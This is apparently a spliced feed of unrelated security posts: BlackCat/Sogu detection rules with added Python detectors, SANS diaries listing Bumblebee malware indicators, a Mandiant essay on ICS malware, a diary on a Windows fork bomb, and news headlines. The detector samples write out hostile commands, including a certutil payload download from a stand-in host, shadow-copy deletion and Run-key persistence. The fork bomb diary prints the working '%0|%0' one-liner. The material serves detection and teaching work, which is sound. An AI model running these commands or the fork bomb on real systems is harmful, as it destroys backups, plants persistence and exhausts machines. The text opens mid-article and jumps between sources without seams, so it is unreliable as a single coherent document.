Please note, this detection can be very loud if end users or administrators commonly search the file system and save results with the “>” argument. To narrow this detection down, add in sensitive file paths that are not often viewed by typical end users to increase fidelity.
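The "Process Name / Command Line CONTAINS / User NOT IN" detections given above for Sogu Scenarios 7 and 11 and for BlackCat Scenarios 1, 3, 4, 5, 6, 7 and 9 can all be evaluated against event ID 4688 records with one small rule evaluator. The Python below is an added example, not AttackIQ's code; its expected-user list and sample events are assumptions.

```python
"""Evaluate the page's process-creation detections against event ID 4688 records.

Each rule transcribes one "Process Name == ... / Command Line CONTAINS ... /
User NOT IN ..." block above; ANY/ALL mirror its OR/AND groups and matching is
case-insensitive substring matching, exactly as CONTAINS implies. The user
allow-list and the sample events are assumptions, not data from the page.
"""
import ntpath


def ANY(*terms):
    return ("any", terms)


def ALL(*terms):
    return ("all", terms)


SHELLS = {"cmd.exe", "powershell.exe"}
EXPECTED_ADMINS = {"corp\\svc_deploy"}   # assumption: users excluded by "User NOT IN"

RULES = [  # (rule name, process names, command-line expression, excluded users)
    ("Sogu 7a: Run key persistence", SHELLS,
     ALL(ANY("reg", "reg.exe"), ANY("HKEY_CURRENT_USER", "HKEY_LOCAL_MACHINE"),
         r"SOFTWARE\Microsoft\Windows\CurrentVersion", ANY("run", "runonce")),
     EXPECTED_ADMINS),
    ("Sogu 11a: systeminfo reconnaissance", SHELLS, "systeminfo", EXPECTED_ADMINS),
    ("BlackCat 1a: certutil download", {"certutil.exe"}, ALL("-urlcache", "-f"), set()),
    ("BlackCat 3a: wmic process creation", {"wmic.exe"},
     ALL("process call create", ANY(".dll", ".exe")), set()),
    ("BlackCat 4a: remote symlink evaluation", SHELLS,
     ALL("fsutil", "SymlinkEvaluation", ANY("R2L:1", "R2R:1")), set()),
    ("BlackCat 5a: MaxMpxCt registry change", SHELLS,
     ALL(ANY("reg", "reg.exe"), "add",
         r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters",
         "/V MaxMpxCt"), set()),
    ("BlackCat 6a: shadow copy deletion", {"vssadmin.exe"}, "delete shadows", set()),
    ("BlackCat 7a: net share enumeration", SHELLS,
     ALL(ANY("net", "net.exe"), "use"), EXPECTED_ADMINS),
    ("BlackCat 7a: arp cache dump", SHELLS, "arp -a", EXPECTED_ADMINS),
    ("BlackCat 9a: dir output redirected to file", SHELLS, ALL("dir", ">"), set()),
]


def matches(expr, cmdline):
    """Recursively evaluate an ANY/ALL expression against a lower-cased command line."""
    if isinstance(expr, str):
        return expr.lower() in cmdline
    op, terms = expr
    hits = [matches(term, cmdline) for term in terms]
    return all(hits) if op == "all" else any(hits)


def evaluate(event):
    """Return the names of every rule that fires on one 4688-style event dict."""
    if event.get("EventID") != 4688:
        return []
    proc = ntpath.basename(event["NewProcessName"]).lower()
    cmd = event.get("CommandLine", "").lower()   # empty unless the command-line GPO is on
    user = (event["SubjectDomainName"] + "\\" + event["SubjectUserName"]).lower()
    return [name for name, procs, expr, excluded in RULES
            if proc in procs and matches(expr, cmd) and user not in excluded]


def _event(exe, cmdline, user="jdoe"):
    """Build a constructed 4688-style record (not real telemetry)."""
    return {"EventID": 4688, "NewProcessName": r"C:\Windows\System32" + "\\" + exe,
            "CommandLine": cmdline, "SubjectDomainName": "CORP", "SubjectUserName": user}


SAMPLE_EVENTS = [
    _event("cmd.exe", r"cmd /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows"
                      r"\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\Public\u.exe"),
    _event("cmd.exe", r"cmd /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows"
                      r"\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\Public\u.exe",
           user="svc_deploy"),                      # same command, expected user
    _event("certutil.exe", "certutil -urlcache -f http://files.example.invalid/t.bin t.bin"),
    _event("vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    _event("cmd.exe", "cmd /c systeminfo"),
    _event("cmd.exe", r"cmd /c dir C:\Users /s > C:\Users\Public\tree.txt"),
    _event("cmd.exe", "fsutil behavior set SymlinkEvaluation R2L:1 R2R:1"),
    _event("notepad.exe", r"notepad C:\Users\jdoe\notes.txt"),   # benign control
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["SubjectUserName"], "|", ev["CommandLine"][:40], "->", evaluate(ev))
```

The page's CONTAINS terms are short substrings ("reg", "use", "dir"), so expect to tighten them (word boundaries, the HKCU/HKLM short forms) when tuning against real 4688 volume.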

9b. Mitigation Policies

Although these are benign Windows commands, they can be used maliciously if threat actors have compromised an account. To reduce this information disclosure, cmd.exe and powershell.exe should be restricted to only the administrative users who need them.

Additionally, ensure that files and directories have proper permissions assigned to prevent unauthorized viewing or modification by underprivileged users.

Scenario 10: Data Encrypted for Impact (T1486): In the last step of the attack graph, we mimic BlackCat’s encryption method, which uses 128-bit AES in CTR mode via AES-NI if the host hardware supports it and falls back to ChaCha20 if not. In addition to the specific encryption algorithm, we also emulate parts of the unique encryption process used by BlackCat.

One of these steps is the use of a temporary checkpoint file written to disk, that serves as a position marker if file encryption is interrupted. A checkpoint file is written to disk for each file during the encryption process and then removed once the file has been fully encrypted. The name of this file is the name of the file being encrypted with the string “checkpoints-” prepended to it. This is a unique IOC and could be used in a detection signature.

Another nuance we’ve captured in the encryption scenario is BlackCat’s file extension exclusion list. The configuration block of BlackCat specifies file names, directories, and extensions to exclude from encryption, ensuring the host remains stable during the process and reducing the number of files to encrypt if they provide no ransom value.

We’ve also taken care to emulate the structure of the file after encryption including an encrypted block of JSON that contains the private key and other metadata required to decrypt the file.

10a. Detection Process

A detection rule could be written to catch the checkpoint file written to disk during the encryption process:

FileName starts_with "checkpoints-"

In addition, Blackcat Ransomware group searches for the following extensions to encrypt:

.themepack, .nls, .diagpkg, .msi, .lnk, .exe, .cab, .scr, .bat, .drv, .rtp, .msp, .prf, .msc, .ico, .key, .ocx, .diagcab, .diagcfg, .pdb, .wpx, .hlp, .icns, .rom, .dll, .msstyles, .mod, .ps1, .ics, .hta, .bin, .cmd, .ani, .386, .lock, .cur, .idx, .sys, .com, .deskthemepack, .shs, .ldf, .theme, .mpa, .nomedia, .spl, .cpl, .adv, .icl, .msu

Excessive file modifications to a variety of these file extensions within a very short time window would be an indicator of this impact activity occurring in your environment.
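An added example (not AttackIQ's code) of the two signals from this detection section, the "checkpoints-" filename IOC and a burst of file modifications by one process, run over a constructed file-event stream; the window and threshold values are assumptions.

```python
"""Detect the BlackCat checkpoint-file IOC and encryption-style write bursts.

Two signals from the detection notes above: any file whose name starts with
"checkpoints-" (created per target file, deleted once that file is done), and
one process modifying many files within a short window. Window and threshold
values are assumptions; the event log below is constructed, not real telemetry.
"""
import ntpath
from collections import defaultdict, deque

CHECKPOINT_PREFIX = "checkpoints-"
BURST_WINDOW = 5.0       # seconds (assumption)
BURST_THRESHOLD = 20     # modifications by one process within the window (assumption)


def build_sample_events():
    """Constructed file events as (timestamp, pid, action, path) tuples."""
    events = []
    for i in range(25):                     # pid 4242 cycles through 25 documents
        t = 1_000.0 + i * 0.1
        doc = rf"C:\Share\docs\report{i}.docx"
        chk = rf"C:\Share\docs\{CHECKPOINT_PREFIX}report{i}.docx"
        events += [(t, 4242, "create", chk), (t + 0.03, 4242, "modify", doc),
                   (t + 0.06, 4242, "delete", chk)]
    for i in range(3):                      # pid 900: a user saving a few files
        events.append((1_000.5 + i, 900, "modify", rf"C:\Users\jdoe\memo{i}.docx"))
    return events


def detect(events):
    """Return (rule, pid, detail) findings from time-ordered file events."""
    findings = []
    pending = {}                       # (pid, target name) -> ts the checkpoint appeared
    recent = defaultdict(deque)        # pid -> timestamps of recent modifications
    burst_flagged = set()
    for ts, pid, action, path in sorted(events):
        name = ntpath.basename(path)
        if name.startswith(CHECKPOINT_PREFIX):
            target = name[len(CHECKPOINT_PREFIX):]
            if action == "create":
                findings.append(("checkpoint_file", pid, path))
                pending[(pid, target)] = ts
            elif action == "delete" and (pid, target) in pending:
                # create-then-delete around one target file: the cycle described above
                findings.append(("checkpoint_cycle", pid, target))
                del pending[(pid, target)]
            continue
        if action == "modify":
            window = recent[pid]
            window.append(ts)
            while ts - window[0] > BURST_WINDOW:
                window.popleft()
            if len(window) >= BURST_THRESHOLD and pid not in burst_flagged:
                burst_flagged.add(pid)
                findings.append(("modify_burst", pid,
                                 f"{len(window)} files modified within {BURST_WINDOW}s"))
    return findings


def summarize(findings):
    """Count findings per (rule, pid) so a 25-file run reads as one line per signal."""
    counts = defaultdict(int)
    for rule, pid, _ in findings:
        counts[(rule, pid)] += 1
    return dict(counts)


if __name__ == "__main__":
    for key, n in sorted(summarize(detect(build_sample_events())).items()):
        print(key, n)
```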

10b. Mitigation Policies

MITRE mitigation Recommendations for T1486:

M1040
M1053

In summary, AttackIQ’s new malware emulation attack graphs emulate core techniques and procedures designed into the malware as a crucial part of an adversary’s overall kill chain. With data generated from continuous testing and use of this attack graph, you can focus your teams on achieving key security outcomes, adjusting your security controls, and working to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ stands at the ready to help security teams implement this attack graph and other aspects of the AttackIQ Security Optimization Platform, including through our co-managed security service, AttackIQ Vanguard.

The post Announcing AttackIQ’s Malware Emulation Attack Graphs appeared first on AttackIQ.

Introduction

Last month, Google’s Threat Analysis Group (TAG) reported on EXOTIC LILY using file transfer services like TransferNow, TransferXL, WeTransfer, or OneDrive to distribute malware (link).  Threat researchers like @k3dg3 occasionally report malware samples from this activity.  Based on @k3dg3’s recent tweet, I searched through VirusTotal and found a handful of active TransferXL URLs delivering ISO files for Bumblebee malware.

Today’s diary reviews an infection generated from this activity on Wednesday 2022-05-18.

Shown above:  Flow chart for infection discussed in this diary.

TransferXL URLs

TransferXL is a legitimate file sharing service.  However, like other services with a cost-free tier, it has been abused by criminals as a way to distribute malicious files.  With TransferXL, though, we have the benefit of seeing the email address used to share the malicious file.  The image below shows a malicious TransferXL URL recently submitted to VirusTotal.  Viewed in a web browser, it sends a malicious file.  The associated email address is jhurris@wolsleyindustrialgroup.com.

Shown above:  Malicious TransferXL URL delivering malware.

The downloaded zip archive contains an ISO disk image.  When double-clicked, this file is mounted as a DVD drive.  The ISO file contains a visible Windows shortcut and a hidden malware DLL for Bumblebee.  Double-clicking the Windows shortcut will run the hidden malware DLL on a vulnerable Windows host.

Shown above:  Downloaded ISO file mounted as a disk image containing Windows shortcut and hidden malware DLL.

Traffic from an infection

After downloading malware from the malicious TransferXL URL, the infected host generated Bumblebee C2 traffic to 194.135.33[.]134 over TCP port 443.

Shown above:  Initial infection activity with Bumblebee C2 traffic filtered in Wireshark.

Approximately 15 minutes after the Bumblebee C2 traffic first appeared, the infected Windows host generated HTTPS traffic to ec2-3-144-143-232-us-east-2.compute.amazonaws[.]com on 3.144.143[.]242 over TCP port 443.  The infected host sent approximately 5.5 MB of data out and received approximately 4.0 MB of data back from that server.

Shown above:  Encrypted (HTTPS) traffic to an amazonAWS server.

Approximately 14 minutes after HTTPS traffic to the amazonAWS server, HTTPS Cobalt Strike traffic appeared on 23.106.215[.]123 over TCP port 443 using xenilik[.]com as the domain.  It lasted approximately 3 minutes.

Shown above:  Traffic from the infection showing Cobalt Strike activity.

Indicators of Compromise (IOCs)

TransferXL URLs associated with the above email returning zip archives containing malicious ISO files.

hxxps://www.transferxl[.]com/download/00ZNPDZqZwZ9m
hxxps://www.transferxl[.]com/download/00jwbtRXtsSsZX
hxxps://www.transferxl[.]com/download/00vJV4K6QVXSq6
hxxps://www.transferxl[.]com/download/00y12VGg75h7K
hxxps://www.transferxl[.]com/download/08j8ZRjHFkVxxc

NOTE: The above URLs usually have ?utm_source=downloadmail&utm_medium=e-mail appended to them.

Email addresses associated with malicious TransferXL URLs:

andresbolivar@southerncompanygas[.]co
jhurris@wolsleyindustrialgroup[.]com
m.jones@wolsleyindustrialgroup[.]com
mjones@wolsleyindustrialgroup[.]co

Domains from the above emails:

southerncompanygas[.]co – registered 2022-04-27
wolsleyindustrialgroup[.]com – registered 2022-04-29
wolsleyindustrialgroup[.]co – not registered

Malware from an infected Windows host:

SHA256 hash: 1ec8c7e21090fb4c667f40c8720388a89789c569169fe0e41ec81567df499aac

File size: 669,897 bytes
File name: TransferXL-00jdMwft3vVZ7Q.zip
File description: Zip archive retrieved from TransferXL URL

SHA256 hash: 24aa82e1a085412686af5d178810fc0d056c5b8167ae5b88973b33071aa14569

File size: 1,052,672 bytes
File name: documents-2205210.iso
File description: ISO file extracted from downloaded zip archive

SHA256 hash: ade875616534b755f33f6012ea263da808dd7eb50bc903fc97722f37fac7c164

File size: 1,191 bytes
File name: New Folder.lnk
File description: Windows shortcut contained in ISO file
Shortcut: C:\Windows\System32\rundll32.exe spc.dll,JQhnMKwhpA

SHA256 hash: 88c07354f1d7b0485452d5c39dc1a6d73884e163bc5489c40adc6662602b4d76

File size: 997,888 bytes
File name: spc.dll
File description: 64-bit DLL (hidden flag set) for Bumblebee malware
Run method: rundll32.exe [filename],JQhnMKwhpA

Traffic from the infected Windows host:

194.135.33[.]144 port 443 – Bumblebee C2 HTTPS traffic
3.144.143[.]242 port 443 – ec2-3-144-143-242.us-east-2.compute.amazonaws[.]com – HTTPS traffic
23.106.215[.]123 port 443 – xenilik[.]com – Cobalt Strike HTTPS traffic

Final words

As the Google TAG blog post notes, EXOTIC LILY is using this method to push Bumblebee malware, and Bumblebee leads to further malware like Cobalt Strike.  And Cobalt Strike has been documented by different sources as leading to ransomware.

Today’s diary reviewed a Bumblebee malware infection associated with EXOTIC LILY that led to Cobalt Strike activity.

Pcap and malware samples associated with this infection are available here.

—Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

INTRODUCTION:

Identified by Proofpoint as the threat actor behind the Contact Forms campaign, TA578 also appears to be pushing ISO files for Bumblebee malware through thread-hijacked emails.  These thread-hijacked emails either have links to storage.googleapis.com URLs similar to those used in the Contact Forms campaign, or they have password-protected zip attachments.  Either method delivers an ISO file containing files to install Bumblebee malware.

Today’s diary compares two examples of ISO files for Bumblebee malware from Monday 2022-05-09 that appear to be from TA578.


Shown above:  Infection chains from TA578 on Monday 2022-05-09.

INFECTION CHAIN COMPARISON: LINK TO ‘DOCUMENT’ DOWNLOAD PAGE:


Shown above:  TA578 Thread-hijacked email with malicious storage.googleapis.com link.


Shown above:  TA578 ‘document’ download page hosted on storage.googleapis.com URL delivers malicious ISO file for Bumblebee malware.


Shown above:  Contents of downloaded document.iso file.

INFECTION CHAIN COMPARISON: PASSWORD-PROTECTED ZIP ATTACHMENT:


Shown above:  TA578 email with password-protected zip attachment.


Shown above:  Malicious ISO file for Bumblebee malware extracted from password-protected zip attachment.

ISO FILE COMPARISON:

SHA256 hash: 330b01256efe185fc3846b6b1903f61e1582b5a5127b386d0542d7a49894d0c2

File size: 2,883,584 bytes
File name: document.iso
File description: malicious ISO file sent by ‘documents’ download page

SHA256 hash: e9084037805a918e00ac406cf99d7224c6e63f72eca3babc014b34863fb81949

File size: 2,883,584 bytes
File name: invoice_pdf_49.iso
File description: malicious ISO file extracted from password-protected zip attachment

ISO CONTENT COMPARISON:

SHA256 hash: 22e033c76bb1070953325f58caeeb5c346eca830033ffa7238fb1e4196b8a1b9

File size: 1,612 bytes
File name: documents.lnk
File description: Windows shortcut in both document.iso and invoice_pdf_49.iso
Shortcut: %windir%\system32\rundll32.exe ramest.dll,SjVjlixjPb

SHA256 hash: e6357f7383b160810ad0abb5a73cfc13a17f4b8ea66d6d1c7117dbcbcf1e9e0f

File size: 1,390,592 bytes
File name: ramest.dll
File description: Bumblebee 64-bit DLL in document.iso

SHA256 hash: f398740233f7821184618c6c1b41bc7f41da5f2dbde75bbd2f06fc1db70f9130

File size: 1,390,080 bytes
File name: ramest.dll
File description: Bumblebee 64-bit DLL in invoice_pdf_49.iso

Note: Both of the above ramest.dll files have the same import hash (imphash) of 66356a654249c4824378b1a70e7cc1e5

SIMILARITIES TO CONTACT FORMS CAMPAIGN:

TA578 ‘document’ download pages are similar to ‘Stolen Images Evidence’ pages used for the Contact Forms campaign.  Both are hosted on storage.googleapis.com pages with appspot.com in the URL.  Both generate traffic to a malicious URL ending in logo.jpg that returns script with base64 text used to generate a malicious ISO file for download.

The following are 4 examples of URLs generated by ‘document’ download pages for malicious ISO files in May 2022:

hxxps://baronrtal[.]com/img/logo.jpg
hxxps://bunadist[.]com/img/logo.jpg
hxxps://omnimature[.]com/img/logo.jpg
hxxps://vorkinal[.]com/img/logo.jpg

The following are 4 examples of URLs generated by ‘Stolen Images Evidence’ pages for malicious ISO files in May 2022:

hxxps://bunadist[.]com/images/logo.jpg
hxxps://curanao[.]com/images/logo.jpg
hxxps://goranism[.]com/images/logo.jpg
hxxps://olodaris[.]com/images/logo.jpg

As seen above, ‘Stolen Images Evidence’ pages generate URLs ending in /images/logo.jpg, while ‘document’ download pages generate URLs ending in /img/logo.jpg.

URLs hosted on storage.googleapis.com for ‘Stolen Images Evidence’ pages end with ?l= or ?h= or similar strings followed by a numeric value.  For example, hxxps://storage.googleapis[.]com/oieqeh1cxwnd81.appspot.com/bl/file/sh/0/fWpa4HT4ck6v6.html?l=827470894993112750 is a URL for a recent ‘Stolen Images Evidence’ page.

URLs hosted on storage.googleapis.com for ‘document’ download pages end in .html.  For example: hxxps://storage.googleapis[.]com/pz3ksj5t45tg4t.appspot.com/q/pub/file/0/filejBWdkst6Ua3s.html is a URL for a recent ‘document’ download page.

FINAL WORDS:

The Contact Forms campaign switches between pushing ISO files for Bumblebee malware, or pushing ISO files for IcedID (Bokbot) malware, and I’ve seen both during the same week.  Since February 2022, TA578 has been noted pushing both families of malware.  And in recent weeks, TA578 has been using thread-hijacked emails to distribute ISO files for Bumblebee malware.  TA578 might also distribute IcedID using the same type of thread-hijacked messages.

While the malware may be different, I occasionally find Cobalt Strike from either Bumblebee or IcedID when testing samples in Active Directory (AD) environments.  Cobalt Strike can lead to ransomware or other malicious activity.

If TA578 activity is caught and stopped in its early stages, potential victims might avoid more serious harm.


Brad Duncan
brad [at] malware-traffic-analysis.net


Engineers, whether working on energy grids or power generation or resource exploitation, are building and maintaining the networks and systems which will be the targets of future ICS malware.

And although we are more aware of threats than ever before, a future attempt to disable safety systems or overload a network with malicious traffic to cause harm will certainly occur, writes Jason Atwell, Principal Advisor of Global Intelligence at Mandiant.

Shortly before Christmas in 2015, the power grid in Ukraine suffered a series of outages that impacted roughly a quarter of a million consumers and lasted several hours.[1] Later, in 2017, the same group used ransomware to shut down servers all over Ukraine, including at the infamous Chernobyl Nuclear Power Plant.[2] The actor behind this attack was a Russian state-sponsored group known as “Sandworm.” Because of the role this group has played in defining the scope of the threat from cyber actors to power grids, cyber professionals and intelligence analysts around the globe have been watching keenly for any evidence of the group’s activity during the current crisis in Ukraine.

Sandworm might be the most infamous group currently known for ICS malware, or malware that is intended specifically to target industrial control systems (ICS) such as programmable logic controllers (PLCs) or unified architecture (UA) servers. This type of malware, while still relatively rare, is more common now than a decade ago, and is increasingly proven capable of achieving dangerous and widespread effects on targeted networks globally.

Ukraine has had the unfortunate distinction of being the place where one of the most noteworthy incidents involving such malware has occurred, but it is far from the only one, and will not be the last to deal with incidents involving it. As anyone who works in the overlapping fields of cyber and engineering knows, it isn’t necessarily the threats or failures you’ve identified that will hurt you, it might be the ones no one has thought of.

The Russian focus on Ukraine’s power grid in particular, and how it has evolved over time, offers valuable lessons for network defenders and industrial engineers as they prepare grids to be resilient against future attacks of this kind.


Exploration of energy sector significance

It is no mistake that most of the discovered ICS malware targets energy, or energy-related, functions and systems. When keeping in mind the intended effects, and the state-sponsored groups behind these capabilities, energy becomes a logical target for ICS malware. Energy plays a critical role in the dynamics of international geopolitics. When nation-states confront one another, the energy sector is often at the center of tensions.

This is because of the critical role energy plays in several key areas: internal stability through essential services; economic health, given the huge role oil and gas play in many economies; the compliance that can be forced when crucial suppliers deny or fail to deliver fuel; and, finally, the fact that it is a rapidly digitizing industry on the forefront of competition between the world’s great powers, making it fertile ground for testing cyber capabilities in a way that sends a quick and direct message.

Besides Ukraine, Saudi Arabia has experienced cyber attacks directed against its energy sector, ones which were both destructive and highly creative in their methodology. Triton malware, which incidentally is also linked to Russia, was used to attempt to cause physical damage at a Saudi petrochemical company by disabling key safety systems, specifically the hardware and software platform used to coordinate across multiple devices.

This focus on eliminating the monitoring, coordination, and redundancy that is essential to modern safety systems could have made the impact of this attack devastating had it fully succeeded. Despite failing, it is understandable why such an attack could benefit a country like Russia, which was assessed to be behind Triton malware and subsequently sanctioned for its development.[3] Russia is in the top tier of nations that both profit from, and are largely dependent on, the energy market.

In past wars the bombing of oil and gas facilities was a priority effort; in future wars the same effects[4] might be achievable from afar using a network connection and a custom malware kit, decreasing the risk to the attacker and increasing the speed and scale of destruction.

Discussion of malware functions and effects

One of the most significant recent developments in ICS malware was the proactive detection and mitigation of a campaign designed to use INCONTROLLER malware to target machine automation devices, specifically those able to interact with specific industrial equipment leveraged across multiple industries. The apparent goal was to interact with that equipment in such a way as to disable safety features, similar to Triton as discussed above.[5]

Future Scenarios

Russia’s attempts to take out critical components of the electrical grid using cyber attacks may have been limited in scope and mostly unsuccessful, especially in terms of Ukraine’s ability to quickly recover, but they do show us where ICS malware and its capabilities are headed in the future. Like many other kinds of malware, ICS malware is increasingly focused on infiltrating the commonalities across systems and networks in order to have the greatest chance of exploitation and success.

That means a focus on widely adopted technology, the coding language used to communicate between them, and the software suites that enable multiple processes. In the future, because malicious actors are increasingly aware of what these critical nodes and common overlays are, attacks will be even more stealthy in how they infiltrate supply chains and achieve effects rapidly, both using our engineering processes against us and taking into account detection and response capabilities.

Mitigation

From an engineering perspective, there are some basic concepts that can help address the rising threat posed by ICS-specific malware. Additionally, the cyber security field is heavily engaged in hardening ICS networks and responding to incidents when they occur. Marrying these parallel efforts is an important part of having a strategic approach to this issue.

First, the earlier in a design process that cyber security can be addressed, the better. A resilient design should include not only redundancies, but ways to check if those redundancies are balancing one another effectively. This eliminates a vector for a bad actor to use safety processes against the system.

Second, operating procedures, either in design or in practice, should include the necessary time and resources to review data and indicators for signs of malicious activity. This includes updates, maintenance, and tests. Malicious activity may not be detectable, even on a secured network, if too much trust is placed in “operations as usual” as an indicator of a secure system.

Third and finally, supply chain issues, in terms of new procurement, upgrades and enhancements, should be addressed as part of the design and build of resilient networks. Reviewing code or hardware for faults or signs of manipulation should be just as important as checking the loads or capacities of more traditional equipment and physical plants. The strongest pipeline or best insulated cable in the world won’t do much good if it’s connected to a compromised piece of network hardware purchased from an entity at odds with the geopolitical stance of the buyer’s host nation or corporate structure. Threat intelligence and past incident case studies can be immensely useful in determining how best to address these three areas for consideration.

Conclusion

Engineers, whether working on energy grids or power generation or resource exploitation, are building and maintaining the networks and systems which will be the targets of future ICS malware. This potential attack surface is complex and growing. The good news is we are more aware of threats than ever before, and the resources dedicated to addressing them are maturing and becoming more accessible. A future attempt to disable safety systems or overload a network with malicious traffic to cause harm will certainly occur, and probably sooner than later, but its actual outcome is largely up to us, not the attacker.

Jason Atwell

About the Author:

Jason Atwell is Principal Advisor of Global Intelligence at Mandiant. Atwell helps oversee the Strategic Intelligence & Government and Global Government Consulting practices. Atwell has over 18 years of experience in cyber and risk intelligence from across the military, government, and commercial sectors.

References

[1] https://www.reuters.com/article/us-ukraine-cybersecurity-sandworm-idUSKBN0UM00N20160108

[2] https://www.independent.co.uk/tech/chernobyl-ukraine-petya-cyber-attack-hack-nuclear-power-plant-danger-latest-a7810941.html

[3] https://home.treasury.gov/news/press-releases/sm1162

[4] https://www.reuters.com/article/us-ukraine-cybersecurity-sandworm-idUSKBN0UM00N20160108

[5] https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool

This article was originally published on Power Engineering.

During a malware analysis class I taught recently, one of the students asked me what was “the simplest malware in the world”. Of course, the answer to this question would depend heavily on one’s definitions of ‘simplest’ and ‘malware’, as well as on a target hardware architecture and its operating system (and potentially additional software and other factors), but I thought that it was conceptually interesting enough to devote today’s diary to.

If we were to discuss simplicity only in terms of the overall size of the code, and define ‘malware’ (with a little help from NIST[1]) as a “program that is intended to compromise the confidentiality, integrity, or availability of the victim’s data, applications, or operating system or to otherwise annoy or hinder the victim”, then the simplest malware overall would probably be a single instruction of the “Halt and Catch Fire” type[2] on any platform where instructions capable (by design or due to a bug) of stopping CPU operations were available and could be executed on their own. Or – to be exact – the simplest malware would probably be such code on the platform where that instruction is shortest (which would probably come to a single byte). However, this is a purely theoretical answer from a historical standpoint.

If we were to move beyond this case and focus only on code that can run on modern operating systems and current hardware platforms, the situation becomes much more complex. And although I spent some time thinking about what the smallest malware might be, and I do have a potential answer, I’m not completely certain it is the correct one. If you can think of a smaller example of working malicious code, let us know in the comments.

Anyway, since I wasn’t able to think of, nor find anything “smaller”, I came to believe that the most common version of the fork bomb for Windows might be the smallest (at least the smallest current) real world malware.

Fork bombs, or “rabbits” or “wabbits”, as they are also sometimes called, are probably among the oldest types of malware overall[3], and they are quite simple. Their only function is to execute two copies of themselves each time they are run. This means that once a fork bomb is executed on a system, the number of fork bomb processes running on that system will start exponentially increasing, which – as you can probably imagine – will quickly result in resource exhaustion.

The most well-known fork bomb for Windows, which may be implemented as a standalone batch file, is made up of only the following 5 ASCII characters (i.e., 5 bytes). 

%0|%0

Despite its small size, it can have a quick and fairly unpleasant effect – feel free to test it for yourself (though, I would recommend that you do so in a VM, which you won’t mind rebooting afterwards).

As I’ve mentioned, I’m not completely sure that this fork bomb is the smallest malware there is for modern platforms, however, with only 5 bytes in length, it has to be at least close… And it shows quite well that malware does not have to be complex to be effective.
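As an added example (not code from the diary above), the following Python flags the exponential self-spawning process tree a fork bomb leaves in a process-table snapshot, and distinguishes it from a benign worker pool that also has many identical processes. The (pid, ppid, cmd) snapshot format, the command strings and the thresholds are assumptions for this example.

```python
"""Flag fork-bomb-like process growth in a (pid, ppid, cmd) snapshot.

A fork bomb such as the batch one-liner discussed above yields a tree of
processes that all share one command line, where each process's parent runs
the same command several generations deep, and whose count explodes within
seconds. A one-level worker pool (one parent, many identical children) looks
similar by count alone, so the check also requires a deep chain of
same-command ancestry. Snapshot format and thresholds are assumptions.
"""
from collections import Counter
from typing import Dict, Iterable, List, NamedTuple, Tuple


class Proc(NamedTuple):
    pid: int
    ppid: int
    cmd: str


def same_cmd_chain_depth(procs: Iterable[Proc]) -> Dict[int, int]:
    """For each pid, count consecutive ancestors running the same command."""
    by_pid = {p.pid: p for p in procs}
    depths: Dict[int, int] = {}
    for p in by_pid.values():
        depth, cur, seen = 0, p, {p.pid}
        while True:
            parent = by_pid.get(cur.ppid)
            # stop at a missing parent, a different command, or a cycle in bad data
            if parent is None or parent.cmd != p.cmd or parent.pid in seen:
                break
            if parent.pid in depths:  # reuse an ancestor whose chain is already known
                depth += depths[parent.pid] + 1
                break
            seen.add(parent.pid)
            depth += 1
            cur = parent
        depths[p.pid] = depth
    return depths


def detect_fork_bomb(procs: List[Proc], min_count: int = 50,
                     min_depth: int = 4) -> List[Tuple[str, int, int]]:
    """Return (cmd, process_count, deepest_same_cmd_chain) for every command
    that has at least min_count processes AND a self-spawn chain at least
    min_depth generations deep (both thresholds are assumptions)."""
    depths = same_cmd_chain_depth(procs)
    counts = Counter(p.cmd for p in procs)
    deepest: Dict[str, int] = {}
    for p in procs:
        deepest[p.cmd] = max(deepest.get(p.cmd, 0), depths[p.pid])
    return sorted((cmd, n, deepest[cmd]) for cmd, n in counts.items()
                  if n >= min_count and deepest[cmd] >= min_depth)


def constructed_fork_bomb(cmd: str, generations: int,
                          root_pid: int = 1000) -> List[Proc]:
    """Constructed snapshot: every process spawns two copies of itself."""
    procs = [Proc(root_pid, 1, cmd)]
    frontier, next_pid = [root_pid], root_pid + 1
    for _ in range(generations):
        new_frontier = []
        for parent in frontier:
            for _ in range(2):
                procs.append(Proc(next_pid, parent, cmd))
                new_frontier.append(next_pid)
                next_pid += 1
        frontier = new_frontier
    return procs


def constructed_worker_pool(cmd: str, workers: int,
                            root_pid: int = 5000) -> List[Proc]:
    """Constructed benign look-alike: one parent with many identical children."""
    return [Proc(root_pid, 1, cmd)] + [
        Proc(root_pid + i, root_pid, cmd) for i in range(1, workers + 1)]


if __name__ == "__main__":
    snapshot = (constructed_fork_bomb("cmd.exe /c bomb.bat", 6)
                + constructed_worker_pool("httpd", 60))
    print(detect_fork_bomb(snapshot))  # [('cmd.exe /c bomb.bat', 127, 6)]
```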

[1] https://csrc.nist.gov/glossary/term/malware
[2] https://en.wikipedia.org/wiki/Halt_and_Catch_Fire_(computing)
[3] https://en.wikipedia.org/wiki/Wabbit_(computing)

———–
Jan Kopriva
@jk0pr
Nettles Consulting

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

An upswing in malware deployed against targets in Eastern Europe. Cozy Bear is typosquatting. CuckooBees swarm around intellectual property. Tracking the DPRK’s hackers. Quiet persistence in corporate networks. CISA issues an ICS advisory. Caleb Barlow on backup communications for your business during this period of “shields up.” Duncan Jones from Cambridge Quantum sits down with Dave to discuss the NIST algorithm finalist Rainbow vulnerability. And, hey, officer, honest, it was just a Squirtle….

For links to all of today’s stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/11/86

Selected reading.

Update on cyber activity in Eastern Europe (Google) 

Multiple government hacking groups stay busy targeting Ukraine and the region, Google researchers say (CyberScoop)

Google: Nation-state phishing campaigns expanding to target Eastern Europe orgs (The Record by Recorded Future)

SolarWinds hackers set up phony media outlets to trick targets (CyberScoop) 

SOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse (Recorded Future) 

